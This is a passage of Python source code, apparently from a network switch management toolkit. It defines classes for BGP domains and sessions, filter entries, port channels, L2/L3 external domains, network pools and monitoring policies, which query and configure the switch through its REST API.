if peer.get_remote_as() is None:
raise ValueError('BGPPeer remote-as is not set')
return self.has_child(peer)
# AF
def add_af(self, af):
"""
Add a af to this BGP Domain.
:param af: Instance of BGPDomainAF class to add to this bgpInst.
"""
if not isinstance(af, BGPDomainAF):
raise TypeError('add_af requires a BGPDomainAF instance')
if af.get_type() is None:
raise ValueError('BGPDomainAF Type is not set')
if af in self.get_afs():
return
self.add_child(af)
def remove_af(self, af):
"""
Remove a af from this bgpInst
:param af: Instance of BGPDomainAF class to remove from this\
bgpInst.
"""
if not isinstance(af, BGPDomainAF):
raise TypeError('remove_af requires a BGPDomainAF instance')
self.remove_child(af)
def get_afs(self):
"""
Get all of the afs on this bgpInst.
:returns: List of BGPDomainAF instances assigned to this bgpInst.
"""
resp = []
children = self.get_children()
for child in children:
if isinstance(child, BGPDomainAF):
resp.append(child)
return resp
def has_af(self, af):
"""
Check if the bgpInst has this particular af.
:returns: True or False. True if this bgpInst has this\
particular BGPDomainAF.
"""
if not isinstance(af, BGPDomainAF):
raise TypeError('has_af requires a BGPDomainAF instance')
if af.get_type() is None:
raise ValueError('BGPDomainAF type is not set')
return self.has_child(af)
@classmethod
def get_deep(cls, session, names=[], limit_to=[], subtree='full', config_only=False):
resp = []
assert isinstance(names, list), ('names should be a list'
' of strings')
# If no tenant names passed, get all tenant names from Switch
if len(names) == 0:
bgpdomains = BGPDomain.get(session)
for bgpdomain in bgpdomains:
names.append(bgpdomain.name)
if len(limit_to):
limit = '&rsp-subtree-class='
for class_name in limit_to:
limit += class_name + ','
limit = limit[:-1]
else:
limit = ''
for name in names:
query_url = ('/api/mo/sys/bgp/inst/dom-%s.json?query-target=self&'
'rsp-subtree=%s' % (name, subtree))
query_url += limit
if config_only:
query_url += '&rsp-prop-include=config-only'
ret = session.get(query_url)
# the following works around a bug encountered in the json returned from the Switch
ret._content = ret._content.replace("\\\'", "'")
data = ret.json()['imdata']
if len(data):
obj = super(BGPDomain, cls).get_deep(full_data=data,
working_data=data,
parent=None,
limit_to=limit_to,
subtree=subtree,
config_only=config_only)
obj._extract_relationships(data)
resp.append(obj)
return resp
def _generate_attributes(self):
attributes = super(BGPDomain, self)._generate_attributes()
attributes['rtrId'] = self._router_id
attributes['name'] = self._name
return attributes
def _populate_from_attributes(self, attributes):
self._router_id = str(attributes['rtrId'])
self._name = str(attributes['name'])
def get_json(self):
"""
Returns json representation of BGPDomain
:returns: json dictionary of BGP Domain
"""
attr = self._generate_attributes()
return super(BGPDomain, self).get_json(self._get_switch_classes()[0],
attributes=attr)
@classmethod
def get(cls, session, parent=None):
"""
Gets all of the BGP Domains from the Switch.
:param parent: Parent object of the BGPDomain
:param session: the instance of Session used for Switch communication
:returns: a list of BGPDomain objects
"""
bgpdomains = BaseNXObject.get_filtered(session, cls,
cls._get_switch_classes()[0], parent)
if parent:
if isinstance(parent, BGPSession):
for bgpdomain in bgpdomains:
parent.add_child(bgpdomain)
return bgpdomains
@classmethod
def exists(cls, session, bgpdomain):
"""
Check if a bgpdomain exists on the Switch.
:param session: the instance of Session used for Switch communication
:param bgpdomain: the instance of BGPDomain to check if exists on the Switch
:returns: True or False
"""
sw_bgpdomains = cls.get(session)
for sw_bgpdomain in sw_bgpdomains:
if bgpdomain == sw_bgpdomain:
return True
return False
@staticmethod
def get_identifier(cls):
return cls._name
@staticmethod
def get_url(str, fmt='json'):
"""
Get the URL used to push the configuration to the Switch
if no format parameter is specified, the format will be 'json'
otherwise it will return '/api/mo/sys/bgp/inst.' with the format string
appended.
:param fmt: optional format string, default is 'json'
:returns: URL string
"""
return '/api/mo/sys/bgp/inst/dom-%s/.' % (str) + fmt
@staticmethod
def get_table(bgpdomains, title=''):
"""
Will create table of switch context information
:param title:
:param bgpdomains:
"""
headers = ['ROUTER ID']
data = []
for bgpdomain in sorted(bgpdomains):
data.append([
bgpdomain._router_id])
data = sorted(data)
table = Table(data, headers, title=title + 'BGP Domains')
return [table, ]
class BGPSession(BaseNXObject):
"""
Creates an BGP router interface that can be attached to a L3 interface.
This interface defines the BGP AS, authentication, etc.
"""
def __init__(self, as_num, parent=None):
"""
:param as_num: String containing the IPv4 as_num
"""
super(BGPSession, self).__init__(as_num)
self._as_num = as_num
self.options = ''
@staticmethod
def is_bgp():
"""
:returns: True if this interface is an BGP Session. In the case\
of BGPSession instances, this is always True.
"""
return True
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('bgpInst')
return resp
@staticmethod
def _get_parent_class():
"""
Gets the nxtoolkit class of the parent object
:returns: class of parent object
"""
return LogicalModel
@staticmethod
def _get_url_extension(self):
return '/bgp/inst'
@staticmethod
def get_identifier(cls):
return cls._as_num
# AS Num
def get_as_num(self):
"""
Get the bgpSession AS Number
:returns: The bgpSession AS Number as a string
"""
return self._as_num
def set_as_num(self, as_num):
"""
Set the bgpSession AS Num
:param as_num: The bgpSession AS Number as a string
"""
if as_num is None:
raise TypeError('AS Number can not be set to None')
self._as_num = as_num
# Domains
def add_domain(self, domain):
"""
Add a BGP Domain to this BGP Session.
:param domain: Instance of BGPDomain class to add to this bgpInst.
"""
if not isinstance(domain, BGPDomain):
raise TypeError('add_domain requires a BGPDomain instance')
if domain.get_name() is None:
raise ValueError('BGPDomain name is not set')
if domain.get_router_id() is None:
raise ValueError('BGPDomain router-id is not set')
if domain in self.get_domains():
return
self.add_child(domain)
def remove_domain(self, domain):
"""
Remove a domain from this bgpInst
:param domain: Instance of BGPDomain class to remove from this\
bgpInst.
"""
if not isinstance(domain, BGPDomain):
raise TypeError('remove_domain requires a BGPDomain instance')
self.remove_child(domain)
def get_domains(self):
"""
Get all of the domains on this bgpInst.
:returns: List of BGPDomain instances assigned to this bgpInst.
"""
resp = []
children = self.get_children()
for child in children:
if isinstance(child, BGPDomain):
resp.append(child)
return resp
def has_domain(self, domain):
"""
Check if the bgpInst has this particular domain.
:returns: True or False. True if this bgpInst has this\
particular BGPDomain.
"""
if not isinstance(domain, BGPDomain):
raise TypeError('has_domain requires a BGPDomain instance')
if domain.get_name() is None:
raise ValueError('BGPDomain name is not set')
if domain.get_router_id() is None:
raise ValueError('BGPDomain router-id is not set')
return self.has_child(domain)
@classmethod
def get_deep(cls, session, names=[], limit_to=[], subtree='full', config_only=False):
resp = []
assert isinstance(names, list), ('names should be a list'
' of strings')
# If no tenant names passed, get all tenant names from Switch
if len(names) == 0:
bgpsessions = BGPSession.get(session)
for bgpsession in bgpsessions:
names.append(bgpsession.name)
if len(limit_to):
limit = '&rsp-subtree-class='
for class_name in limit_to:
limit += class_name + ','
limit = limit[:-1]
else:
limit = ''
for name in names:
query_url = ('/api/mo/sys/bgp/inst.json?query-target=self&'
+ 'rsp-subtree=%s' % (subtree))
query_url += limit
if config_only:
query_url += '&rsp-prop-include=config-only'
ret = session.get(query_url)
# the following works around a bug encountered in the json returned from the Switch
ret._content = ret._content.replace("\\\'", "'")
data = ret.json()['imdata']
if len(data):
obj = super(BGPSession, cls).get_deep(full_data=data,
working_data=data,
parent=None,
limit_to=limit_to,
subtree=subtree,
config_only=config_only)
obj._extract_relationships(data)
resp.append(obj)
return resp
def _generate_attributes(self):
attributes = {}
attributes['asn'] = self._as_num
return attributes
def _populate_from_attributes(self, attributes):
self._as_num = str(attributes['asn'])
def get_json(self):
"""
Returns json representation of BGPSession
:returns: json dictionary of BGP Session
"""
attr = self._generate_attributes()
bgp_inst = super(BGPSession, self).get_json(self._get_switch_classes()[0],
attributes=attr)
return {'bgpEntity': {'attributes': {},
'children': [bgp_inst]}}
@classmethod
def get(cls, session, parent=None):
"""
Gets all of the BGP Sessions from the Switch.
:param parent: Parent object of the BGPSession
:param session: the instance of Session used for Switch communication
:returns: a list of BGPSession objects
"""
bgpsessions = BaseNXObject.get(session, cls, cls._get_switch_classes()[0])
if parent:
if isinstance(parent, LogicalModel):
for bgpsession in bgpsessions:
parent.add_child(bgpsession)
return bgpsessions
@classmethod
def exists(cls, session, bgpsession):
"""
Check if a bgpsession exists on the Switch.
:param session: the instance of Session used for Switch communication
:param bgpsession: the instance of BGPSession to check if exists on the Switch
:returns: True or False
"""
sw_bgpsessions = cls.get(session)
for sw_bgpsession in sw_bgpsessions:
if bgpsession == sw_bgpsession:
return True
return False
@staticmethod
def get_url(str, fmt='json'):
"""
Get the URL used to push the configuration to the Switch
if no format parameter is specified, the format will be 'json'
otherwise it will return '/api/mo/sys/bgp/inst.' with the format string
appended.
:param fmt: optional format string, default is 'json'
:returns: URL string
"""
return '/api/mo/sys/bgp/.' + fmt
@staticmethod
def get_table(bgpsessions, title=''):
"""
Will create table of switch context information
:param title:
:param bgpsessions:
"""
headers = ['AS NUM']
data = []
for bgpsession in sorted(bgpsessions):
data.append([bgpsession._as_num])
data = sorted(data)
table = Table(data, headers, title=title + 'BGP Sessions')
return [table, ]
class FilterEntry(BaseNXObject):
""" FilterEntry : roughly equivalent to vzEntry """
def __init__(self, name, parent, applyToFrag='0', arpOpc='0',
dFromPort='0', dToPort='0', etherT='0', prot='0',
sFromPort='0', sToPort='0', tcpRules='0'):
"""
:param name: String containing the name of this FilterEntry instance.
:param applyToFrag: True or False. True indicates that this\
FilterEntry should be applied to IP fragments.
:param arpOpc: 'req' or 'reply'. Indicates that this FilterEntry\
should be applied to ARP Requests or ARP replies.
:param dFromPort: String containing the lower L4 destination port\
number of the L4 destination port number range.
:param dToPort: String containing the upper L4 destination port\
number of the L4 destination port number range.
:param etherT: String containing the EtherType of the frame to be\
matched by this FilterEntry.
:param prot: String containing the L4 protocol number to be\
matched by this FilterEntry.
:param sFromPort: String containing the lower L4 source port\
number of the L4 source port number range.
:param sToPort: String containing the upper L4 source port\
number of the L4 source port number range.
:param tcpRules: Bit mask consisting of the TCP flags to be matched\
by this FilterEntry.
"""
self.applyToFrag = applyToFrag
self.arpOpc = arpOpc
self.dFromPort = dFromPort
self.dToPort = dToPort
self.etherT = etherT
self.prot = prot
self.sFromPort = sFromPort
self.sToPort = sToPort
self.tcpRules = tcpRules
super(FilterEntry, self).__init__(name, parent)
def _generate_attributes(self):
attributes = super(FilterEntry, self)._generate_attributes()
attributes['applyToFrag'] = self.applyToFrag
attributes['arpOpc'] = self.arpOpc
attributes['dFromPort'] = self.dFromPort
attributes['dToPort'] = self.dToPort
attributes['etherT'] = self.etherT
attributes['prot'] = self.prot
attributes['sFromPort'] = self.sFromPort
attributes['sToPort'] = self.sToPort
attributes['tcpRules'] = self.tcpRules
return attributes
def _populate_from_attributes(self, attributes):
self.applyToFrag = str(attributes['applyToFrag'])
self.arpOpc = str(attributes['arpOpc'])
self.dFromPort = str(attributes['dFromPort'])
self.dToPort = str(attributes['dToPort'])
self.etherT = str(attributes['etherT'])
self.prot = str(attributes['prot'])
self.sFromPort = str(attributes['sFromPort'])
self.sToPort = str(attributes['sToPort'])
self.tcpRules = str(attributes['tcpRules'])
def get_json(self):
"""
Returns json representation of the FilterEntry
:returns: json dictionary of the FilterEntry
"""
attr = self._generate_attributes()
text = super(FilterEntry, self).get_json('vzEntry',
attributes=attr)
filter_name = self.get_parent().name + self.name
text = {'vzFilter': {'attributes': {'name': filter_name},
'children': [text]}}
return text
@classmethod
def get(cls, session, parent, tenant):
"""
To get all of nxtoolkit style Filter Entries Switch class.
:param session: the instance of Session used for Switch communication
:param parent: Object to assign as the parent to the created objects.
:param tenant: Tenant object to assign the created objects.
"""
apic_class = 'vzRsSubjFiltAtt'
if isinstance(tenant, str):
raise TypeError
logging.debug('%s.get called', cls.__name__)
if tenant is None:
tenant_url = ''
else:
tenant_url = '/tn-%s' % tenant.name
if parent is not None:
tenant_url = tenant_url + parent._get_url_extension()
query_url = ('/api/mo/uni%s.json?query-target=subtree&'
'target-subtree-class=%s' % (tenant_url, apic_class))
ret = session.get(query_url)
data = ret.json()['imdata']
logging.debug('response returned %s', data)
resp = []
for object_data in data:
dn = object_data['vzRsSubjFiltAtt']['attributes']['dn']
tDn = object_data['vzRsSubjFiltAtt']['attributes']['tDn']
tRn = object_data['vzRsSubjFiltAtt']['attributes']['tRn']
if dn.split('/')[2][4:] == parent.name and \
dn.split('/')[4][len(apic_class) - 1:] == dn.split('/')[3][5:] and \
dn.split('/')[3][5:] == tDn.split('/')[2][4:] and tDn.split('/')[2][4:] == tRn[4:]:
filter_name = str(object_data[apic_class]['attributes']['tRn'][4:])
contract_name = filter_name[:len(parent.name)]
entry_name = filter_name[len(parent.name):]
if contract_name == parent.name and entry_name != '':
query_url = ('/api/mo/uni%s/flt-%s.json?query-target=subtree&'
'target-subtree-class=vzEntry&'
'query-target-filter=eq(vzEntry.name,"%s")' % (tenant_url, filter_name, entry_name))
ret = session.get(query_url)
filter_data = ret.json()['imdata']
if len(filter_data) == 0:
continue
logging.debug('response returned %s', filter_data)
resp = []
obj = cls(entry_name, parent)
attribute_data = filter_data[0]['vzEntry']['attributes']
obj._populate_from_attributes(attribute_data)
resp.append(obj)
return resp
@classmethod
def create_from_apic_json(cls, data, parent):
"""
create from the apic json
:param data: json dictionary
:param parent: parent object
:return: object created from json dictionary
"""
attributes = data['vzEntry']['attributes']
entry = cls(name=str(attributes.get('name')),
parent=parent)
entry._populate_from_attributes(attributes)
return entry
@staticmethod
def get_table(filters, title=''):
"""
Will create table of filter information for a given tenant
:param title:
:param filters:
"""
headers = ['Filter', 'EtherType',
'Protocol', 'Arp Opcode', 'L4 DPort', 'L4 SPort', 'TCP Flags', 'Apply to Fragment']
data = []
for filter in sorted(filters, key=lambda x: (x.name)):
data.append([
filter.name,
filter.etherT,
filter.prot,
filter.arpOpc,
FilterEntry._get_port(filter.dFromPort, filter.dToPort),
FilterEntry._get_port(filter.sFromPort, filter.sToPort),
filter.tcpRules,
filter.applyToFrag,
])
data = sorted(data)
table = Table(data, headers, title=title + 'Filters')
return [table, ]
@staticmethod
def _get_port(from_port, to_port):
"""
will build a string that is a port range or a port number
depending upon the from_port and to_port value
"""
if from_port == to_port:
return str(from_port)
return '{0}-{1}'.format(str(from_port), str(to_port))
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.applyToFrag != other.applyToFrag:
return False
if self.arpOpc != other.arpOpc:
return False
if self.dFromPort != other.dFromPort:
return False
if self.dToPort != other.dToPort:
return False
if self.etherT != other.etherT:
return False
if self.prot != other.prot:
return False
if self.sFromPort != other.sFromPort:
return False
if self.sToPort != other.sToPort:
return False
if self.tcpRules != other.tcpRules:
return False
return True
class PortChannel(BaseInterface):
"""
This class defines a port channel interface.
"""
def __init__(self, pc_id, admin_st=None, delay=None, descr=None,
layer=None, duplex=None, mtu=None,
snmp_trap=None, speed=None, link_log=None,
session=None, mode=None, min_link=None, interfaces=None,
pc_mode=None):
if not isinstance(pc_id, str):
raise TypeError ('string expected')
self.if_name = 'po' + pc_id
super(PortChannel, self).__init__(name=self.if_name)
self.pc_id = pc_id
self.admin_st = admin_st
self.delay = delay
self.descr = descr
self.layer = layer
self.duplex = duplex
self.link_log = link_log
self.mtu = mtu
self.snmp_trap = snmp_trap
self.speed = speed
self._session = session
self.mode = mode
self.min_link = min_link
self.access_vlan = None
self.pc_mode = pc_mode
if interfaces is None:
self._interfaces = []
else:
self._interfaces = copy.deepcopy(interfaces)
self._nodes = []
def attach(self, interface):
"""Attach an interface to this PortChannel"""
if interface not in self._interfaces:
self._interfaces.append(interface)
def set_access_vlan(self, access):
"""Set vlans for port channel"""
self.access_vlan = access
def detach(self, interface):
"""Detach an interface from this PortChannel"""
if interface in self._interfaces:
self._interfaces.remove(interface)
def is_vpc(self):
"""Returns True if the PortChannel is a VPC"""
return len(self._interfaces) > 1
def is_interface(self):
"""Returns True since a PortChannel is an interface"""
return True
def _get_interfaces(self):
""" Returns a single node id or multiple node ids in the
case that this is a VPC
"""
return self._interfaces
def _get_attributes(self):
attributes = {}
attributes['pcId'] = self.pc_id
if self.admin_st:
attributes['adminSt'] = self.admin_st
if self.delay:
attributes['delay'] = self.delay
if self.descr:
attributes['descr'] = self.descr
if self.duplex:
attributes['duplex'] = self.duplex
if self.layer:
attributes['layer'] = self.layer
if self.link_log:
attributes['linkLog'] = self.link_log
if self.mtu:
attributes['mtu'] = self.mtu
if self.snmp_trap:
attributes['snmpTrapSt'] = self.snmp_trap
if self.speed:
attributes['speed'] = self.speed
if self.mode:
attributes['mode'] = self.mode
if self.min_link:
attributes['minLinks'] = self.min_link
if self.pc_mode:
attributes['pcMode'] = self.pc_mode
if self.if_name:
attributes['name'] = self.if_name
attributes['id'] = self.if_name
if self.access_vlan:
attributes['accessVlan'] = self.access_vlan
return attributes
def get_url(self, fmt='json'):
"""
Get the URLs used to push the configuration to the Switch
if no format parameter is specified, the format will be 'json'
otherwise it will return '/api/mo/uni.' with the format string
appended.
:param fmt: optional format string, default is 'json'
:returns: URL string
"""
#return '/api/mo/sys/aggr-[po%s].json' % (self.pc_id)
return '/api/mo/sys/intf/aggr-[po%s].json' % (self.pc_id)
def get_json(self):
"""
Returns json representation of the PortChannel
:returns: json dictionary of the PortChannel
"""
attributes = self._get_attributes()
children = []
for interface in self._interfaces:
att = {'tDn': 'sys/intf/phys-[%s]' % (interface.if_name)}
child = BaseNXObject.get_json(self, 'pcRsMbrIfs', attributes=att)
children.append(child)
return super(PortChannel, self).get_json('pcAggrIf',
attributes=attributes,
children=children)
@staticmethod
def get(session, pc_id=None):
"""Gets all of the port channel interfaces from the Switch
:param session: the instance of Session used for switch communication
:param pc_id: string port channel id
:return list of PortChannel objects
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
if pc_id:
if not isinstance(pc_id, str):
raise TypeError('When specifying a specific port channel id'
'the port id must be a identified by a str')
query_url = '/api/mo/sys/aggr-[po%s].json?rsp-subtree=full'\
% str(pc_id)
else:
query_url = '/api/class/pcAggrIf.json?rsp-subtree=full'
pc_list = []
port_chs = session.get(query_url).json()['imdata']
for pc in port_chs:
pc_id = str(pc['pcAggrIf']['attributes']['pcId'])
layer = str(pc['pcAggrIf']['attributes']['layer'])
admin_st = str(pc['pcAggrIf']['attributes']['adminSt'])
desc = str(pc['pcAggrIf']['attributes']['descr'])
duplex = str(pc['pcAggrIf']['attributes']['duplex'])
delay = str(pc['pcAggrIf']['attributes']['duplex'])
link_log = str(pc['pcAggrIf']['attributes']['linkLog'])
mtu = str(pc['pcAggrIf']['attributes']['mtu'])
snmp_trap = str(pc['pcAggrIf']['attributes']['snmpTrapSt'])
speed = str(pc['pcAggrIf']['attributes']['speed'])
session = session
mode = str(pc['pcAggrIf']['attributes']['mode'])
min_link = str(pc['pcAggrIf']['attributes']['minLinks'])
pc_mode = str(pc['pcAggrIf']['attributes']['pcMode'])
access_vlan = str(pc['pcAggrIf']['attributes']['accessVlan'])
trunk_vlans = str(pc['pcAggrIf']['attributes']['trunkVlans'])
interfaces = []
for int in pc['pcAggrIf']['children']:
if int.get('pcRsMbrIfs'):
interface = str(int['pcRsMbrIfs']['attributes']['tSKey'])
#module = interface.replace('eth', '').split('/')[0]
#port = interface.replace('eth', '').split('/')[1]
#interfaces.append(Interface('eth', module, port))
interfaces.append(Interface(interface))
new_pc = PortChannel(pc_id=pc_id, admin_st=admin_st,
layer=layer, descr=desc, duplex=duplex,
delay=delay, link_log=link_log,
mtu=mtu, snmp_trap=snmp_trap,
speed=speed, session=session, mode=mode,
min_link=min_link, interfaces=interfaces,
pc_mode=pc_mode)
new_pc.set_access_vlan(access_vlan)
pc_list.append(new_pc)
return pc_list
class L2ExtDomain(BaseNXObject):
"""
L2ExtDomain class
"""
def __init__(self, name, parent):
"""
:param name: String containing the L2ExtDomain name
:param parent: An instance of DomP class representing
"""
self.dn = None
self.lcOwn = None
self.childAction = None
self.name = name
super(L2ExtDomain, self).__init__(name, parent)
def get_json(self):
"""
Returns json representation of the l2extDomP object
:returns: A json dictionary of fvTenant
"""
attr = self._generate_attributes()
return super(L2ExtDomain, self).get_json(self._get_switch_classes()[0],
attributes=attr)
def _generate_attributes(self):
"""
Gets the attributes used in generating the JSON for the object
"""
attributes = dict()
if self.name:
attributes['name'] = self.name
if self.dn:
attributes['dn'] = self.dn
if self.lcOwn:
attributes['lcOwn'] = self.lcOwn
if self.childAction:
attributes['childAction'] = self.childAction
return attributes
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('l2extDomP')
return resp
def get_parent(self):
"""
:returns: Parent of this object.
"""
return self._parent
@classmethod
def get(cls, session):
"""
Gets all of the L2Ext Domains from the Switch
:param session: the instance of Session used for Switch communication
:returns: List of L2ExtDomain objects
"""
toolkit_class = cls
apic_class = cls._get_switch_classes()[0]
parent = None
logging.debug('%s.get called', cls.__name__)
query_url = (('/api/mo/uni.json?query-target=subtree&'
'target-subtree-class=') + str(apic_class))
ret = session.get(query_url)
data = ret.json()['imdata']
logging.debug('response returned %s', data)
resp = []
for object_data in data:
name = str(object_data[apic_class]['attributes']['name'])
obj = toolkit_class(name, parent)
attribute_data = object_data[apic_class]['attributes']
obj._populate_from_attributes(attribute_data)
obj.dn = object_data[apic_class]['attributes']['dn']
obj.lcOwn = object_data[apic_class]['attributes']['lcOwn']
obj.childAction = object_data[apic_class]['attributes']['childAction']
resp.append(obj)
return resp
@classmethod
def get_by_name(cls, session, infra_name):
"""
Gets all of the Physical Domainss from the Switch
:param session: the instance of Session used for Switch communication
:returns: List of L2ExtDomain objects
"""
toolkit_class = cls
apic_class = cls._get_switch_classes()[0]
parent = None
logging.debug('%s.get called', cls.__name__)
query_url = (('/api/mo/uni.json?query-target=subtree&'
'target-subtree-class=') + str(apic_class))
ret = session.get(query_url)
data = ret.json()['imdata']
logging.debug('response returned %s', data)
for object_data in data:
name = str(object_data[apic_class]['attributes']['name'])
obj = toolkit_class(name, parent)
attribute_data = object_data[apic_class]['attributes']
obj._populate_from_attributes(attribute_data)
obj.dn = object_data[apic_class]['attributes']['dn']
obj.lcOwn = object_data[apic_class]['attributes']['lcOwn']
obj.childAction = object_data[apic_class]['attributes']['childAction']
if name == infra_name:
return obj
return None
class L3ExtDomain(BaseNXObject):
"""
L3ExtDomain class
"""
def __init__(self, name, parent):
"""
:param name: String containing the name of the external routed domain
:param parent: An instance of DomP class
"""
self.dn = None
self.lcOwn = None
self.childAction = None
self.name = name
super(L3ExtDomain, self).__init__(name, parent)
def get_json(self):
"""
Returns json representation of the fvTenant object
:returns: A json dictionary of fvTenant
"""
attr = self._generate_attributes()
return super(L3ExtDomain, self).get_json(self._get_switch_classes()[0],
attributes=attr)
def _generate_attributes(self):
"""
Gets the attributes used in generating the JSON for the object
"""
attributes = dict()
if self.name:
attributes['name'] = self.name
if self.dn:
attributes['dn'] = self.dn
if self.lcOwn:
attributes['lcOwn'] = self.lcOwn
if self.childAction:
attributes['childAction'] = self.childAction
return attributes
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('l3extDomP')
return resp
def get_parent(self):
"""
:returns: Parent of this object.
"""
return self._parent
@classmethod
def get(cls, session):
"""
Gets all of the Physical Domains from the Switch
:param session: the instance of Session used for Switch communication
:returns: List of L3Ext Domain objects
"""
toolkit_class = cls
apic_class = cls._get_switch_classes()[0]
parent = None
logging.debug('%s.get called', cls.__name__)
query_url = (('/api/mo/uni.json?query-target=subtree'
'&target-subtree-class=') + str(apic_class))
ret = session.get(query_url)
data = ret.json()['imdata']
logging.debug('response returned %s', data)
resp = []
for object_data in data:
name = str(object_data[apic_class]['attributes']['name'])
obj = toolkit_class(name, parent)
attribute_data = object_data[apic_class]['attributes']
obj._populate_from_attributes(attribute_data)
obj.dn = object_data[apic_class]['attributes']['dn']
obj.lcOwn = object_data[apic_class]['attributes']['lcOwn']
obj.childAction = object_data[apic_class]['attributes']['childAction']
resp.append(obj)
return resp
@classmethod
def get_by_name(cls, session, infra_name):
"""
Gets all of the L3Ext Domains from the Switch
:param session: the instance of Session used for Switch communication
:returns: List of L3Ext Domain objects
"""
toolkit_class = cls
apic_class = cls._get_switch_classes()[0]
parent = None
logging.debug('%s.get called', cls.__name__)
query_url = (('/api/mo/uni.json?query-target=subtree&'
'target-subtree-class=') + str(apic_class))
ret = session.get(query_url)
data = ret.json()['imdata']
logging.debug('response returned %s', data)
for object_data in data:
name = str(object_data[apic_class]['attributes']['name'])
obj = toolkit_class(name, parent)
attribute_data = object_data[apic_class]['attributes']
obj._populate_from_attributes(attribute_data)
obj.dn = object_data[apic_class]['attributes']['dn']
obj.lcOwn = object_data[apic_class]['attributes']['lcOwn']
obj.childAction = object_data[apic_class]['attributes']['childAction']
if name == infra_name:
return obj
return None
class NetworkPool(BaseNXObject):
"""This class defines a pool of network ids
"""
def __init__(self, name, encap_type, start_id, end_id, mode):
super(NetworkPool, self).__init__(name)
valid_encap_types = ['vlan', 'vxlan']
if encap_type not in valid_encap_types:
raise ValueError('Encap type specified is not a valid encap type')
self.encap_type = encap_type
self.start_id = start_id
self.end_id = end_id
valid_modes = ['static', 'dynamic']
if mode not in valid_modes:
raise ValueError('Mode specified is not a valid mode')
self.mode = mode
def get_json(self):
from_id = self.encap_type + '-' + self.start_id
to_id = self.encap_type + '-' + self.end_id
fvnsEncapBlk = {'fvnsEncapBlk': {'attributes': {'name': 'encap',
'from': from_id,
'to': to_id},
'children': []}}
if self.encap_type == 'vlan':
fvnsEncapInstP_string = 'fvnsVlanInstP'
elif self.encap_type == 'vxlan':
fvnsEncapInstP_string = 'fvnsVxlanInstP'
fvnsEncapInstP = {fvnsEncapInstP_string: {'attributes':
{'name': self.name,
'allocMode': self.mode},
'children': [fvnsEncapBlk]}}
infra = {'infraInfra': {'attributes': {},
'children': [fvnsEncapInstP]}}
return infra
class Search(BaseNXObject):
"""This is an empty class used to create a search object for use with
the "find" method.
Attaching attributes to this class and then invoking find will return
all objects with matching attributes in the object hierarchy at and
below where the find is invoked.
"""
def __init__(self):
pass
class BaseMonitorClass(object):
""" Base class for monitoring policies. These are methods that can be
used on all monitoring objects.
"""
def set_name(self, name):
"""
Sets the name of the MonitorStats.
:param name: String to use as the name
"""
self.name = str(name)
self.modified = True
def set_description(self, description):
"""
Sets the description of the MonitorStats.
:param description: String to use as the description
"""
self.description = description
self.modified = True
def isModified(self):
"""
Returns True if this policy and any children have been modified or
created and not been written to the Switch
"""
for child in self._children:
if child.isModified():
return True
return self.modified
def get_parent(self):
"""
:returns: parent object
"""
return self._parent
def add_stats(self, stat_obj):
"""
Adds a stats family object.
:param stat_obj: Statistics family object of type MonitorStats.
"""
self.monitor_stats[stat_obj.scope] = stat_obj
self.modified = True
def remove_stats(self, stats_family):
"""
Remove a stats family object. The object to remove is identified by
a string, e.g. 'ingrPkts', or 'egrTotal'. This string can be found
in the 'MonitorStats.scope' attribute of the object.
:param stats_family: Statistics family string.
"""
if not isinstance(stats_family, str):
raise TypeError('MonitorStats must be identified by a string')
if stats_family in self.monitor_stats:
self.monitor_stats.remove(stats_family)
self.modified = True
def add_target(self, target_obj):
"""
Add a target object.
:param target_obj: target object of type MonitorTarget
"""
self.monitor_target[target_obj.scope] = target_obj
self.modified = True
def remove_target(self, target):
"""
Remove a target object. The object to remove is identified by
a string, e.g 'l1PhysIf'. This string can be found
in the 'MonitorTarget.scope' attribute of the object.
:param target: target to remove.
"""
if not isinstance(target, str):
raise TypeError('MonitorTarget must be identified by a string')
if target in self.monitor_target:
self.monitor_target.remove(target)
self.modified = True
def add_collection_policy(self, coll_obj):
"""
Add a collection policy.
:param coll_obj : A collection policy object of type CollectionPolicy
"""
self.collection_policy[coll_obj.granularity] = coll_obj
self.modified = True
def remove_collection_policy(self, collection):
"""
Remove a collection_policy object. The object to remove is identified
by its granularity, e.g. '5min', '15min', etc. This string can be
found in the 'CollectionPolicy.granularity' attribute of the object.
:param collection: CollectionPolicy to remove.
"""
if collection not in CollectionPolicy.granularityEnum:
raise TypeError(('CollectionPolicy must be identified by its'
'granularity'))
if collection in self.collection_policy:
self.collection_policy.remove(collection)
self.modified = True
class MonitorPolicy(BaseMonitorClass):
"""
This class is the top-most container for a monitoring policy that controls
how statistics are gathered. It has immediate children, CollectionPolicy
objects, that control the default behavior for any network element that
uses this monitoring policy. It may optionally have MonitorTarget objects
as children that are used to override the default behavior for a
particular target class such as Interfaces. There can be further
granularity of control through children of the MonitorTarget sub-objects.
Children of the MonitorPolicy will be CollectionPolicy objects that define
the collection policy plus optional MonitorTarget objects that allow finer
grained control over specific target Switch objects such as 'l1PhysIf'
(layer 1 physical interface).
The CollectionPolicy children are contained in a dictionary called
"collection_policy" that is indexed by the granulariy of the
CollectionPolicy, e.g. '5min', '15min', etc.
The MonitorTarget children are contained in a dictionary called
"monitor_target" that is indexed by the name of the target object,
e.g. 'l1PhysIf'.
To make a policy take effect for a particular port, for example, you must
attach that monitoring policy to the port.
Note that the name of the MonitorPolicy is used to construct the dn of the
object in the Switch. As a result, the name cannot be changed.
If you read a policy from the Switch, change the name, and write it back,
it will create a new policy with the new name and leave the old, original
policy, in place with its original name.
A description may be optionally added to the policy.
"""
def __init__(self, policyType, name):
"""
The MonitorPolicy is initialized with simply a policy type and a name.
There are two policy types: 'fabric' and 'access'. The 'fabric'
monitoring policies can be applied to certain MonitorTarget types and
'access' monitoring policies can be applied to other MonitorTarget
types. Initially however, both policies can have l1PhysIf as targets.
A name must be specified because it is used to build the distinguising
name (dn) along with the policyType in the Switch. The dn for
"fabric" policies will be /uni/fabric/monfabric-[name] and for "access"
policies it will be /uni/infra/moninfra-[name] in the Switch.
:param policyType: String specifying whether this is a fabric or\
access policy
:param name: String specifying a name for the policy.
"""
policyTypeEnum = ['fabric', 'access']
if policyType not in policyTypeEnum:
